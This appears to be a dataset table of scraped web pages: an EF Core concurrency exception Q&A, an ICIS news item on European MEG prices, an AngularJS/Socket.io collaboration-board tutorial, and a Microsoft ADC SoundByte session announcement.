text
stringlengths 454
608k
| url
stringlengths 17
896
| dump
stringlengths 9
15
⌀ | source
stringclasses 1
value | word_count
int64 101
114k
| flesch_reading_ease
float64 50
104
|
---|---|---|---|---|---|
I'm migrating code to DotNet Core. I need to resolve a reference to
OptimisticConcurrencyException. What NuGet package do I need to load?
If you're migrating to EF Core, the closest you can get is
DbUpdateConcurrencyException.
The general approach to handle a concurrency conflicts is:
- Catch
DbUpdateConcurrencyExceptionduring
SaveChanges.
- Use
DbUpdateConcurrencyException.Entriesto prepare a new set of changes for the affected entities.
- Refresh the original values of the concurrency token to reflect the current values in the database.
- Retry the process until no conflicts occur.
source:
EDIT:
OptimisticConcurrencyException is in the
System.Data.Entity.Core namespace which is part of the
EntityFramework (EF6) library.
EF Core is a complete rewrite of the entity framework library so it's highly likely that
OptimisticConcurrencyException never went in EF Core.
There was also this thread that suggested to just catch
DbUpdateConcurrencyException in EF6. And it was also pointed out that the two exceptions in EF6 just adds confusion. So maybe the EF Core team decided to just implement one over the other.
If still in doubt, create an issue in the EF Core github repo. They're receptive of answering the issues and it might help other users too with the same problem. :) | https://entityframeworkcore.com/knowledge-base/50789338/what-nuget-package-contains-optimisticconcurrencyexception-for-dotnet-core- | CC-MAIN-2020-40 | refinedweb | 200 | 50.84 |
20 August 2010 22:12 [Source: ICIS news]
LONDON (ICIS)--A combination of delayed shipments, fewer imports and good demand was resulting in a tighter European monoethylene glycol (MEG) market and spot prices were climbing, sources said on Friday.
“I have never seen anything like this. The fundamentals are in place what with new capacities on stream, for prices to come down,” a buyer experiencing higher prices commented.
Even suppliers were short and prepared to pay over €700/tonne ($897/tonne) for bulk material due into ?xml:namespace>
These ICIS-assessed prices were up from lows of €630/tonne CIF (cost, insurance and freight) NWE (northwest
This was evident in the spot deals reported this week at up to €715/tonne, with an offer for 2,000 tonnes €10/tonne higher.
“[Traders are] very short because they can’t import Iranian [MEG],” a reseller commented.
Proposed sanctions against
“Shipments have been delayed from August to September. All European producers say they are sold out for September because the regular importers have turned to [them] for September product,” another trader said.
Availability from the
Demand was proving to be high.
Downstream polyethylene terephthalate (PET) producers were experiencing a surge of requirements not only due to the traditional summer high season for bottlers but also from customers speculating on PET prices bottoming out in August.
Requests from the industrial sector were also kicking in.
“Consumption is very, very high. The high season is starting,” one customer said.
The tight market came as a surprise to some players and one acknowledged: “I admit, I was sure numbers would go down. In the meantime I have changed my view”.
($1 = €0.78)
ICIS has launched weekly pricing reports in
For more on MEG, | http://www.icis.com/Articles/2010/08/20/9387179/europe-meg-market-bullish-amidst-tight-supply.html | CC-MAIN-2013-48 | refinedweb | 289 | 62.38 |
> I. > I feel obliged to speak on the matter as I was the one who redefined AVERROR_* to POSIX errors. Thing is, libav* was already returning POSIX error codes in most cases, those codes were only used in some places. Sometimes also just -1 was returned. When adding the fix for BeOS (where POSIX errors are already negative), I changed those to what seemed the closest POSIX code. There is no way to split the error namespace to stuff either the POSIX errors or other specific errors because you can't know the values for POSIX errors. (libusb wrongly uses an arbitrary value of 50000 or something somewhere... nasty). On BeOS the POSIX errors are a subset of all system errors, defined like this: #define B_GENERAL_ERROR_BASE LONG_MIN #define B_OS_ERROR_BASE B_GENERAL_ERROR_BASE + 0x1000 #define B_APP_ERROR_BASE B_GENERAL_ERROR_BASE + 0x2000 ... #define B_STORAGE_ERROR_BASE B_GENERAL_ERROR_BASE + 0x6000 #define B_POSIX_ERROR_BASE B_GENERAL_ERROR_BASE + 0x7000 ... #define E2BIG (B_POSIX_ERROR_BASE + 1) #define ECHILD (B_POSIX_ERROR_BASE + 2) ... #define ENOMEM B_NO_MEMORY #define EACCES B_PERMISSION_DENIED Where they either map to a reserved part of the namespace, or existing system error. I think it's the same on win32. It could be possible to map to non-posix system errors, but it would be OS-dependant, which is too much hasle for not much profit. /*--- Developer-defined errors start at (B_ERRORS_END+1)----*/ #define B_ERRORS_END (B_GENERAL_ERROR_BASE + 0xffff) We could use unreserved parts of the namespace though to map extra errors, like: #define AVERROR_NOMEM AVERROR(ENOMEM) #define AVERROR_NONUM (AVERROR_BASE+0) #define AVERROR_FMT (AVERROR_BASE+1) with AVERROR_BASE defined in os_support.h to be in the unreserved part of the codes. On Unix that could be something like libusb's 50000... But all this is probably overkill. As for undefined error, EINVAL is probably generic enough, didn't find better. Fran?ois. | http://ffmpeg.org/pipermail/ffmpeg-devel/2007-July/029602.html | CC-MAIN-2014-42 | refinedweb | 289 | 55.03 |
Investors in Cameco Corp. (Symbol: CCJ) saw new options become available today, for the December 6th expiration. At Stock Options Channel, our YieldBoost formula has looked up and down the CCJ options chain for the new December CCJ, that could represent an attractive alternative to paying $9.16.78% return on the cash commitment, or 23.56% annualized — at Stock Options Channel we call this the YieldBoost.
Below is a chart showing the trailing twelve month trading history for Cameco Corp., and highlighting in green where the $9.00 strike is located relative to that history:
Turning to the calls side of the option chain, the call contract at the $9.50 strike price has a current bid of 20 cents. If an investor was to purchase shares of CCJ stock at the current price level of $9.16/share, and then sell-to-open that call contract as a "covered call," they are committing to sell the stock at $9.50. Considering the call seller will also collect the premium, that would drive a total return (excluding dividends, if any) of 5.90% if the stock gets called away at the December 6th expiration (before broker commissions). Of course, a lot of upside could potentially be left on the table if CCJ shares really soar, which is why looking at the trailing twelve month trading history for Cameco Corp., as well as studying the business fundamentals becomes important. Below is a chart showing CCJ's trailing twelve month trading history, with the $9.50 strike highlighted in red:
Considering the fact that the $9.50.18% boost of extra return to the investor, or 18.52% annualized, which we refer to as the YieldBoost.
The implied volatility in the put contract example is 47%, while the implied volatility in the call contract example is 43%.
Meanwhile, we calculate the actual trailing twelve month volatility (considering the last 251 trading day closing values as well as today's price of $9.16) to be 31%.. | https://www.nasdaq.com/articles/ccj-december-6th-options-begin-trading-2019-10-24 | CC-MAIN-2022-40 | refinedweb | 335 | 65.32 |
JavaScriptHow to
AngularJS collaboration board with Socket.io
Lukas Ruebbelke demonstrates all the steps necessary to build a real-time collaboration board powered by AngularJS and Socket.io.
- Knowledge needed: Intermediate JavaScript
- Requires: Node.js, NPM
- Project Time: 2 hours
AngularJS is particularly well-suited for creating rich client-side applications in the browser and, when you add in a little Socket.io into the mix, things get really interesting. In this article we are going to build a real-time collaboration board that uses AngularJS for the client-side application and Socket.io to share state between all connected clients.
Let's cover a bit of housekeeping before we get started. I'm going to presume that you have a fundamental grasp of HTML and JavaScript as I'm not going to cover every little corner of the code. For instance, I'm not going to call out the CSS and JavaScript files I've included in the head of the HTML file as there is no new information there.
Also, I encourage you to grab the code from my GitHub account to follow along. My good friend Brian Ford also has an excellent Socket.io seed, which I based some of my original ideas on.
The four main features we want in the collaboration board is the ability to create a note, read the notes, update a note, delete a note and, for fun, move a note on the board. Yes, that's correct, we're focusing on standard CRUD features. I believe that by focusing on these fundamental features, we will have covered enough code for patterns to emerge so that you can take them and apply them elsewhere.
01. The server
We're going to start with the Node.js server first since it'll serve as the foundation that we're going to build everything else on.
We're going to be building a Node.js server with Express and Socket.io. The reason we're using Express is that it provides a nice mechanism for setting up a static asset server within Node.js. Express comes with a bunch of really awesome features but, in this case, we're going to use it to bisect the application cleanly between the server and client.
(I'm operating under the assumption that you have Node.js and NPM installed. A quick Google search will show you how to get these installed if you don't.)
02. The bare bones
So to build the bare bones of the server, we need to do a couple things to get up and running.
// app.js
// A.1
var express = require('express'),
app = express();
server = require('http').createServer(app),
io = require('socket.io').listen(server);
// A.2
app.configure(function() {
app.use(express.static(__dirname + '/public'));
});
// A.3
server.listen(1337);
A.1 We are declaring and instantiating our Node.js modules so that we can use them in our application. We are declaring Express, instantiating Express and then creating an HTTP server and sending in the Express instance into it. And from there we're instantiating Socket.io and telling it to keep an eye on our server instance.
A.2 We're then telling our Express app to use our public directory to serve files from.
A.3 We start up the server and tell it to listen on port 1337.
So far that has been pretty painless and quick. I believe we're less than 10 lines into the code and already we have a functional Node.js server. Onward!
03. Declare your dependencies
// packages.json
{
"name": "angular-collab-board",
"description": "AngularJS Collaboration Board",
"version": "0.0.1-1",
"private": true,
"dependencies": {
"express": "3.x",
"socket.io": "0.9.x"
}
}
One of the nicest features of NPM is the ability to declare your dependencies in a packages.json file and then automatically install them via npm install on the command line.
04. Wire up Socket.io
We have already defined the core features that we want in the application and so we need to set up Socket.io event listeners and an appropriate closure to handle the event for each operation.
In the code below you will notice that it's essentially a configuration of event listeners and callbacks. The first event is the connection event, which we use to wire up our other events in the closure.
io.sockets.on('connection', function(socket) {
socket.on('createNote', function(data) {
socket.broadcast.emit('onNoteCreated', data);
});
socket.on('updateNote', function(data) {
socket.broadcast.emit('onNoteUpdated', data);
});
socket.on('deleteNote', function(data){
socket.broadcast.emit('onNoteDeleted', data);
});
socket.on('moveNote', function(data){
socket.broadcast.emit('onNoteMoved', data);
});
});
From here we add listeners to createNote, updateNote, deleteNote and moveNote. And in the callback function, we're simply broadcasting what event happened so that any client listening can be notified that the event happened.
There are a few things worth pointing out about the callback functions in the individual event handlers. One, if you want to send an event to everyone else but the client that emitted the event you insert broadcast before the emit function call. Secondly, we're simply passing the payload of the event on to the interested parties so that they can process it how they see fit.
05. Start your engines!
Now that we have defined our dependencies and set up our Node.js application with Express and Socket.io powers, it's quite simple to initialise the Node.js server.
First you install your Node.js dependencies like so:
npm install
And then you start the server like this:
node app.js
And then! You go to this address in your browser. Bam!
06. A few candid thoughts before moving on
I'm primarily a frontend developer and I was initially a bit intimidated with hooking up a Node.js server to my application. The AngularJS part was a snap but server side JavaScript? Queue the creepy music from a horror flick.
But, I was absolutely floored to discover I could set up a static web server in just a few lines of code and in a few more lines use Socket.io to handle all the events between the browsers. And it was still just JavaScript! For the sake of timeliness, we're only covering a few features, but I hope that it by the end of the article you will see that it is easy to swim - and the deep end of the pool is not so scary.
07. The client
Now that we have our solid foundation in place with our server, let's move on to my favourite part - the client! We're going to be using AngularJS, jQueryUI for the draggable part and Twitter Bootstrap for a style base.
08. The bare bones
As a matter of personal preference, when I start a new AngularJS application I like to quickly define the bare minimum that I know I'm going to need to get started and then start iterating over that as quickly as possible.
Every AngularJS application needs to be bootstrapped with at least one controller present and so this is generally where I always start.
To automatically bootstrap the application you need to simply add ng-app to the HTML node in which you want the application to live. Most of the time, adding it to the HTML tag is going to be perfectly acceptable. I've also added an attribute to ng-app to tell it that I want to use the app module, which I will define in just a moment.
// public/index.html
<html ng-
I know I'm going to need at least one controller and so I will call that out using ng-controller and assigning it a property of MainCtrl.
<body ng-</body>
So now we're on the hook for a module named app and a controller named MainCtrl. Let us go ahead and create them now.
Creating a module is fairly straightforward. You define it by calling angular.module and giving it a name. For future reference, the second parameter of an empty array is where you can inject sub-modules for use in the application. It is out of the scope of this tutorial, but is handy when your application starts to grow in complexity and needs.
// public/js/collab.js
var app = angular.module('app', []);
We're going to declare a few empty placeholders in the app module starting with the MainCtrl below. We will fill these all in later but I wanted to illustrate the basic structure from the onset.
app.controller('MainCtrl', function($scope) { });
We are also going to wrap the Socket.io functionality in a socket service so that we can encapsulate that object and not leave it floating around on the global namespace.
app.factory('socket', function($rootScope) { });
And while we are at it, we're going to declare a directive called stickyNote that we are going to use to encapsulate the sticky note functionality in.
app.directive('stickyNote', function(socket) { });
So let us review what we have done so far. We have bootstrapped the application using ng-app and declared our application controller in the HTML. We've also defined the application module and created the MainCtrl controller, the socket service and the stickyNote directive.
09. Creating a sticky note
Now that we have the skeleton of the AngularJS application in place, we will start building out the creation feature.
app.controller('MainCtrl', function($scope, socket) { // B.1
$scope.notes = []; // B.2
// Incoming
socket.on('onNoteCreated', function(data) { // B.3
$scope.notes.push(data);
});
// Outgoing
$scope.createNote = function() { // B.4
var note = {
id: new Date().getTime(),
title: 'New Note',
body: 'Pending'
};
$scope.notes.push(note);
socket.emit('createNote', note);
};
B.1 AngularJS has a dependency injection feature built into it so we're injecting a $scope object and the socket service. The $scope object serves as a ViewModel and is basically a JavaScript object with some events baked into it to enable two-way databinding.
B.2 We're declaring the array in which we will use to bind the view to.
B.3 We're adding a listener for the onNoteCreated event on the socket service and pushing the event payload into the $scope.notes array.
B.4 We've declared a createNote method that creates a default note object and pushes it into the $scope.notes array. It also uses the socket service to emit the createNote event and pass the new note object along.
So now that we have a method to create the note, how do we call it? That is a good question! In the HTML file, we add the built in AngularJS directive ng-click to the button and then add the createNote method call as the attribute value.
<button id="createButton" ng-Create Note</button>
Time for a quick review of what we have done so far. We've added an array to the $scope object in the MainCtrl that's going to hold all the notes for the application. We have also added a createNote method on the $scope object to create a new local note and then broadcast that note to the other clients via the socket service. We've also added an event listener on the socket service so we can know when other clients have created a note so we can add it to our collection.
10. Displaying the sticky notes
We now have the ability to create a note object and share it between browsers but how do we actually display it? This is where directives come in.
Directives and their intricacies is a vast subject, but the short version is that they provide a way to extend elements and attributes with custom functionality. Directives are easily my favourite part about AngularJS because it allows you to essentially create an entire DSL (Domain Specific Language) around your application in HTML.
It's natural that since we are going to be creating sticky notes for our collaboration board that we should create a stickyNote directive. Directives are defined by calling the directive method on a module you want to declare it on and passing in a name and a function that return a directive definition object. The directive definition object has lots of possible properties you can define on it, but we're going to use just a few for our purposes here.
I recommend that you check out the AngularJS documentation to see the entire lists of properties you can define on the directive definition object.
app.directive('stickyNote', function(socket) {
var linker = function(scope, element, attrs) { };
var controller = function($scope) { };
return {
restrict: 'A', // C.1
link: linker, // C.2
controller: controller, // C.3
scope: { // C.4
note: '=',
ondelete: '&'
}
};
});
C.1 You can restrict your directive to a certain type of HTML element. The two most common are element or attribute, which you declare using E and A respectively. You can also restrict it to a CSS class or a comment, but these are not as common.
C.2 The link function is where you put all your DOM manipulation code. There are a few exceptions that I have found, but this is always true (at least 99 per cent of the time). This is a fundamental ground rule of AngularJS and is why I have emphasised it.
C.3 The controller function works just like the main controller we defined for the application but the $scope object we're passing in is specific to the DOM element the directive lives on.
C.4 AngularJS has a concept of isolated scope, which allows you to explicitly define how a directive’s scope communicates with the outside world. If we had not declared scope the directive would have implicitly inherited from the parent scope with a parent-child relationship. In a lot of cases this is not optimal. By isolating the scope we mitigate the chances that the outside world can inadvertently and adversely affect the state of your directive.
I have declared two-way data-binding to note with the = symbol and an expression binding to ondelete with the & symbol. Please read the AngularJS documentation for a full explanation of isolated scope as it is one of the more complicated subjects in the framework.
So let’s actually add a sticky note to the DOM.
Like any good framework, AngularJS comes with some really great features right out of the box. One of the handiest features is ng-repeat. This AngularJS directive allows you to pass in an array of objects and it duplicates whatever tag it is on as many times as there are items in the array. In the case below, we are iterating over the notes array and duplicating the div element and its children for the length of the notes array.
<div sticky-note
<button type="button" class="close" ng-×</button>
<input ng-
<textarea ng-{{note.body}}</textarea>
</div>
The beauty of ng-repeat is that it is bound to whatever array you pass in and, when you add an item to the array, your DOM element will automatically update. You can take this a step further and repeat not only standard DOM elements but other custom directives as well. That is why you see sticky-note as an attribute on the element.
There are two other bits of custom code that need to be clarified. We have isolated the scope on the sticky-notes directive on two properties. The first one is the binding defined isolated scope on the note property. This means that whenever the note object changes in the parent scope, it will automatically update the corresponding note object in the directive and vice versa. The other defined isolated scope is on the ondelete attribute. What this means is that when ondelete is called in the directive, it will call whatever expression is in the ondelete attribute on the DOM element that instantiates the directive.
When a directive is instantiated it's added to the DOM and the link function is called. This is a perfect opportunity to set some default DOM properties on the element. The element parameter we are passing in is actually a jQuery object and so we can perform jQuery operations on it.
(AngularJS actually comes with a subset of jQuery built into it but if you have already included the full version of jQuery, AngularJS will defer to that.)
app.directive('stickyNote', function(socket) {
var linker = function(scope, element, attrs) {
// Some DOM initiation to make it nice
element.css('left', '10px');
element.css('top', '50px');
element.hide().fadeIn();
};
});
In the above code we are simply positioning the sticky note on the stage and fading it in.
11.Deleting a sticky note
So now that we can add and display a sticky note, it is time to delete sticky notes. The creation and deletion of sticky notes is a matter of adding and deleting items from the array that the notes are bound to. This is the responsibility of the parent scope to maintain that array, which is why we originate the delete request from within the directive, but let the parent scope do the actual heavy lifting.
This is why we went through all the trouble of creating expression defined isolated scope on the directive: so the directive could receive the delete event internally and pass it on to its parent for processing.
Notice the HTML inside the directive.
<button type="button" class="close" ng-×</button>
The very next thing I am going to say may seem like a long way around but remember we are on the same side and it will make sense after I elaborate. When the button in the upper right hand corner of the sticky note is clicked we are calling deleteNote on the directive’s controller and passing in the note.id value. The controller then calls ondelete, which then executes whatever expression we wired up to it. So far so good? We're calling a local method on the controller which then hands it off to by calling whatever expression was defined in the isolated scope. The expression that gets called on the parent just happens to be called deleteNote as well.
app.directive('stickyNote', function(socket) {
var controller = function($scope) {
$scope.deleteNote = function(id) {
$scope.ondelete({
id: id
});
};
};
return {
restrict: 'A',
link: linker,
controller: controller,
scope: {
note: '=',
ondelete: '&'
}
};
});
(When using expression-defined isolated scope, parameters are sent in an object map.)
In the parent scope, deleteNote gets called and does a fairly standard deletion using the angular.forEach utility function to iterate over the notes array. Once the function has handled its local business it goes ahead and emits the event for the rest of the world to react accordingly.
app.controller('MainCtrl', function($scope, socket) {
$scope.notes = [];
// Incoming
socket.on('onNoteDeleted', function(data) {
$scope.deleteNote(data.id);
});
// Outgoing
$scope.deleteNote = function(id) {
var oldNotes = $scope.notes,
newNotes = [];
angular.forEach(oldNotes, function(note) {
if(note.id !== id) newNotes.push(note);
});
$scope.notes = newNotes;
socket.emit('deleteNote', {id: id});
};
});
12. Updating a sticky note
.jpg)
We're making fantastic progress! By now I hope that you are starting to see some patterns emerging from this whirlwind tour we're taking. Next item on the list is the update feature.
We're going to start at the actual DOM elements and follow it up all the way to the server and back down to the client. First we need to know when the title or body of the sticky note is being changed. AngularJS treats form elements as part of the data model so you can hook up two-way data-binding in a snap. To do this use the ng-model directive and put in the property you want to bind to. In this case we're going to use note.title and note.body respectively.
When either of these properties change we want to capture that information to pass along. We accomplish this with the ng-change directive and use it to call updateNote and pass in the note object itself. AngularJS does some very clever dirty checking to detect if the value of whatever is in ng-model has changed and then executes the expression that is in ng-change.
<input ng-
<textarea ng-{{note.body}}</textarea>
The upside of using ng-change is that the local transformation has already happened and we are just responsible for relaying the message. In the controller, updateNote is called and from there we are going to emit the updateNote event for our server to broadcast to the other clients.
app.directive('stickyNote', function(socket) {
var controller = function($scope) {
$scope.updateNote = function(note) {
socket.emit('updateNote', note);
};
};
});
And in the directive controller, we are listening for the onNoteUpdated event to know when a note from another client has updated so that we can update our local version.
var controller = function($scope) {
// Incoming
socket.on('onNoteUpdated', function(data) {
// Update if the same note
if(data.id == $scope.note.id) {
$scope.note.title = data.title;
$scope.note.body = data.body;
}
});
};
13. Moving a sticky note
At this point we have basically done a lap around the CRUD kiddie pool and life is good! Just for the sake of a parlor trick to impress your friends, we're going to add in the ability to move notes around the screen and update coordinates in real time. Don’t panic - it's just a few more lines of code. All this hard work is going to pay off. I promise!
We've invited special guest, jQueryUI, to the party, and we did it all for the draggables. Adding in the ability to drag a note locally only takes one line of code. If you add in element.draggable(); to your linker function you will start hearing 'Eye of the Tiger' by Survivor because you can now drag your notes around.
We want to know when the dragging has stopped and capture the new coordinates to pass along. jQueryUI was built by some very smart people, so when the dragging stops you simply need to define a callback function for the stop event. We grab the note.id off the scope object and the left and top CSS values from the ui object. With that knowledge we do what we have been doing all along: emit!
app.directive('stickyNote', function(socket) {
var linker = function(scope, element, attrs) {
element.draggable({
stop: function(event, ui) {
socket.emit('moveNote', {
id: scope.note.id,
x: ui.position.left,
y: ui.position.top
});
}
});
socket.on('onNoteMoved', function(data) {
// Update if the same note
if(data.id == scope.note.id) {
element.animate({
left: data.x,
top: data.y
});
}
});
};
});
At this point it should come as no surprise that we're also listening for a move related event from the socket service. In this case it is the onNoteMoved event and if the note is a match then we update the left and top CSS properties. Bam! Done!
14. The bonus
This is a bonus section that I would not include if I were not absolutely confident you could achieve it in less than 10 minutes. We're going to deploy to a live server (I am still amazed at how easy it is to do).
First, you need to go sign up for a free Nodejitsu trial. The trial is free for 30 days, which is perfect for the sake of getting your feet wet.
Once you have created your account you need to install the jitsu package, which you can do from the command line via $ npm install jitsu -g.
Then you need to login in from the command line via $ jitsu login and enter your credentials.
Make sure you are in your app directly, type $ jitsu deploy and step through the questions. I usually leave as much to default as possible, which means I give my application a name but not a subdomain etc.
And, my dear friends, that is all there is to it! You will get the URL to your application from the output of the server once it has deployed and it is ready to go.
15. Conclusion
We've covered a lot of AngularJS ground in this article and I hope you had a lot of fun in the process. I think it's really neat what you can accomplish with AngularJS and Socket.io in approximately 200 lines of code.
There were a few things I didn't cover for the sake of focusing on the main points, but I encourage you to pull down the source and play around with the application. We have built a strong foundation, but there are still a lot of features you could add. Get hacking!
Lukas Ruebbelke is a technology enthusiast and is co-authoring AngularJS in Action for Manning Publications. His favorite thing to do is get people as excited about new technology as he is. He runs the Phoenix Web Application User Group and has hosted multiple hackathons with his fellow partners in crime.
Liked this? Read these!
- How to make an app
- Our favourite web fonts - and they don't cost a penny
- Discover what's next for Augmented Reality
- Download free textures: high resolution and ready to use now | http://www.creativebloq.com/javascript/angularjs-collaboration-board-socketio-2132885 | CC-MAIN-2015-18 | refinedweb | 4,211 | 64.91 |
i have a design question about xsp logicsheets. i have two logicsheets,
sql and calendar. sql retrieves results from a database, and calendar
generates a calendar view. calendar's generate method can take an argument
indicating the date around which the view should be created. i'd like for
that argument to be one of the values in the database resultset. i cannot
think of an easy way to do this using merely xsp logicsheets, but i think
it's something i ought to be able to do.
my first avenue of attack was to insert a logicsheet between the two that
would create the call to the calendar logicsheet from the results of the
sql logicsheet invokation. unfortunately, you can't match on the elements
created by the sql logicsheet - they're part of the result document. the
only way i can think of that'd you be able to do it would be to add
another XSLT and XSP process, which i'm loathe to do.
is this a design flaw in the sql logicsheet, the calendar logicsheet or a
problem in general with having logicsheets that invoke other logicsheets
with arguments chosen at runtime?
... playing ...
i'm leaning towards a design flaw in the sql logicsheet. rather than
approach the logicsheet itself by tossing everything into a java library,
a judicious use of xslt in the logicsheet might clear everything
up. supposing we modified the sql namespace so that you could write things
like this:
<sql:execute-query>
<sql:query>...</sql:query>
<sql:results>
<calendar:get-month>
<calendar:value><sql:get-string</calendar:value>
</calendar:get-month>
</sql:results>
</sql:execute-query>
that might solve the problem, and conceivable a slew of other ones. how
would we modify the logicsheet to support that?
... coding ...
<xsl:template
<xsp:logic>
{
...
ResultSet rs = st.executeQuery("<xsl:value-of");
while (rs.next()) {
<xsl:for-each
<xsl:apply-templates/>
</xsl:for-each>
rs.close();
...
}
</xsp:logic>
</xsl:template>
<xsl:template
<xsp:expr>rs.getString("<xsl:value-of")</xsp:expr>
</xsl:template>
would this be a good way to tackle it?
if this is the best way to go about doing it, i can foresee one problem
right away - it's almost certainly going to bang people up against the 64k
java method limitation if it's written basically as i've laid it
out. how could we avoid that?
- donald | http://mail-archives.apache.org/mod_mbox/cocoon-dev/200008.mbox/%[email protected]%3E | CC-MAIN-2015-18 | refinedweb | 398 | 55.74 |
»
JSP
Author
help connecting to mysql database
david halewood
Greenhorn
Joined: Dec 28, 2006
Posts: 3
posted
Dec 28, 2006 15:15:00
0
I got this ervlet off of coreservlets.com but want to change it so instead of each catalogItem being typed in it gets the infomation from mysql database:
package coreservlets; /** A catalog that lists the items available in inventory. * <P> * Taken from Core Servlets and JavaServer Pages 2nd Edition * from Prentice Hall and Sun Microsystems Press, * <a href="." target="_blank" rel="nofollow">.</a> * © 2003 Marty Hall; may be freely used or adapted. */ public class Catalog { // This would come from a database in real life. // We use a static table for ease of testing and deployment. // See JDBC chapters for info on using databases in // servlets and JSP pages. private static CatalogItem[] items = { new CatalogItem ("hall002", "<I>Core Web Programming, 2nd Edition</I> " + "by Marty Hall and Larry Brown", "One stop shopping for the Web programmer. " + "Topics include \n" + "<UL><LI>Thorough coverage of Java 2; " + "including Threads, Networking, Swing, \n" + "Java 2D, RMI, JDBC, and Collections\n" + "<LI>A fast introduction to HTML 4.01, " + "including frames, style sheets, and layers.\n" + "<LI>A fast introduction to HTTP 1.1, " + "servlets, and JavaServer Pages.\n" + "<LI>A quick overview of JavaScript 1.2\n" + "</UL>", 49.99), new CatalogItem ("lewis001", "<I>The Chronicles of Narnia</I> by C.S. Lewis", "The classic children's adventure pitting " + "Aslan the Great Lion and his followers\n" + "against the White Witch and the forces " + "of evil. Dragons, magicians, quests, \n" + "and talking animals wound around a deep " + "spiritual allegory. Series includes\n" + "<I>The Magician's Nephew</I>,\n" + "<I>The Lion, the Witch and the Wardrobe</I>,\n" + "<I>The Horse and His Boy</I>,\n" + "<I>Prince Caspian</I>,\n" + "<I>The Voyage of the Dawn Treader</I>,\n" + "<I>The Silver Chair</I>, and \n" + "<I>The Last Battle</I>.", 19.95) }; public static CatalogItem getItem(String itemID) { CatalogItem item; if (itemID == null) { return(null); } for(int i=0; i<items.length; i++) { item = items[i]; if (itemID.equals(item.getItemID())) { return(item); } } return(null); } }
I have made this code below which gets data from mysql tables, at the moment i use it as a simple search but is there a way to merge the two together so the above code gets it catalogItems by using the select statement like in the code below?
import java.io.*; import javax.servlet.*; import javax.servlet.http.*; import java.sql.*; // Connects to a database to retrieve music data public class browser extends HttpServlet { public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { response.setContentType("text/html"); PrintWriter out = response.getWriter(); // Database connection code starts here Connection conn = null; // loading jdbc driver for mysql (help in mysql.jar file in classpath) try{ Class.forName("com.mysql.jdbc.Driver").newInstance(); } catch(Exception e) { System.out.println(e); } // connecting to database try{ // connection string for demos database, username demos, password demo-pass conn = DriverManager.getConnection ("jdbc:mysql:/mysql url goes here"); // System.out.println("Connection to database successful."); } catch(SQLException se) { System.out.println(se); } // Create select statement and execute it try{ // Get the category from the input form String categoryString = request.getParameter("category"); // check if no category if (categoryString == "")\n" + "<center><img src=\"\" width=350 height=200/></center>\n" + "<H1 ALIGN=\"CENTER\">" + title + "</H1>\n"); out.println("<TABLE BORDER=1 ALIGN=\"CENTER\">\n" + "<TR BGCOLOR=\"#FFAD00\">\n" + " <TH>Title\n" + " <TH>Director\n" + " <TH>Rating\n" + " <TH>Year Released\n" + " <TH>Price\n" + " <TH>Number in stock\n" + " <TH>image name" ); // Retrieve the results while(rs1.next()){ // getInt or getString or getFloat etc to get the appropriate column data // wrap output in html for web out.println("<TR>" + "<TD>" + rs1.getString("title") + "</TD>" + "<TD>" + rs1.getString("director") + "</TD>" + "<TD>" + rs1.getString("rating") + "</TD>" + "<TD>" + rs1.getDouble("year_released") + "</TD>" + "<TD>" + rs1.getString("price") + "</TD>" + "<TD>" + rs1.getString("stock_count") + "</TD>" + "<TD>" + rs1.getString("image_name") +"</TD>\n"); //"<TD> <IMG SRC=\"../images/music/" + image_name +"\">" } // close the html out.println("</TABLE></BODY></HTML>"); // Close the stament and database connection // (must remember to always do this) stmt.close(); conn.close(); } catch(SQLException se) { System.out.println(se); } } }
Any help at all would be really helpful as i am really finding this hard, if you go to
you can see the other files for how the catalog works. Again any help would be helpful this is very stessing lol
[ December 29, 2006: Message edited by: david halewood ]
[ December 29, 2006: Message edited by: david halewood ]
Ben Souther
Sheriff
Joined: Dec 11, 2004
Posts: 13410
I like...
posted
Dec 29, 2006 05:24:00
0
David,
JavaRanch tip:
If you are going to post more than a line or two of your code, wrap that
code in a set of UBB Code tags.
Doing so will help to preserve your code's indenting, making it easier to read.
If it is easier to read, more people will actaully read it and you will
stand a better chance of getting help with your question.
See
UseCodeTags
for more
help with UBB code tags.
I was going to add them for you but when attempting to do so, I noticed that the code has no indenting.
You can edit your post by clicking on the
link.
Java API
J2EE API
Servlet Spec
JSP Spec
How to ask a question...
Simple Servlet Examples
jsonf
david halewood
Greenhorn
Joined: Dec 28, 2006
Posts: 3
posted
Dec 30, 2006 05:38:00
0
private static CatalogItem[] addedItem private static CatalogItem[] items; // stores list of items CatalogItem item; CatalogItem details; int recordingidDB; String directorDB; String titleDB; String categoryDB; String imageDB; int durationDB; String ratingDB; String yearDB; float priceDB; int StockDB; String\n" + "<center>\n" + "<H1 ALIGN=\"CENTER\">" + title + "</H1>\n"); // loop to go over each item in the array of catalogItem for(int i=0; i<items.length; i++) { out.println("__________________________"); details = item[i]; [B]addedItem[][/B] if (details == null) { out.println("SORRY THERE HAS BEEN AN ERROR "); } else { out.println(titleDB + "\n" + priceDB + "\n"); out.println("</BODY></HTML>"); } } public static CatalogItem getItem(int recordingidDB) { CatalogItem item; for(int i=0; i<items.length; i++) { item = items[i]; if (recordingidDB.equals(item.getItemID())) { return(item); } } return(null); } // Close the stament and database connection // (must remember to always do this) stmt.close(); conn.close(); } catch(SQLException se) { System.out.println(se); } } }
I came up with the above solution but it still does not work fully i have been told i need to add the item to a array during the first for loop, i called the array addedItem but do not know how to add the item to it can any body help me?
I agree. Here's the link:
subject: help connecting to mysql database
Similar Threads
Sending Email from jsp page
two dropdown menus
Storing of Data
Error 500 when trying to run servlet connecting to mysql
cookies problem
All times are in JavaRanch time: GMT-6 in summer, GMT-7 in winter
JForum
|
Paul Wheaton | http://www.coderanch.com/t/291202/JSP/java/connecting-mysql-database | CC-MAIN-2014-49 | refinedweb | 1,174 | 56.25 |
The ADC Team has three further SoundBytes scheduled over the coming months. Two are repeats of popular sessions by Morgan Skinner and Chris Barker, and the third is a new session delivered by Simon Ince.
The titles, dates, and abstracts are shown below.
The sessions are charged at the rate of 1 hour from your ADC contract, or 2 proactive hours from your Premier contract, if you haven’t yet got an ADC contract. For this price you may have up to 2 Live Meeting connections, and you are of course free to use these to broadcast to a room full of people in your office.
If you require further information on this subject after the event, you can of course engage with the ADC team as usual to setup a suitable session.
SoundByte
Instrumenting Your .NET Application (Morgan Skinner)
Date & Time
Wednesday 29th July 2009 from 11:00 – 12:00 UK Time
Level
300
Abstract
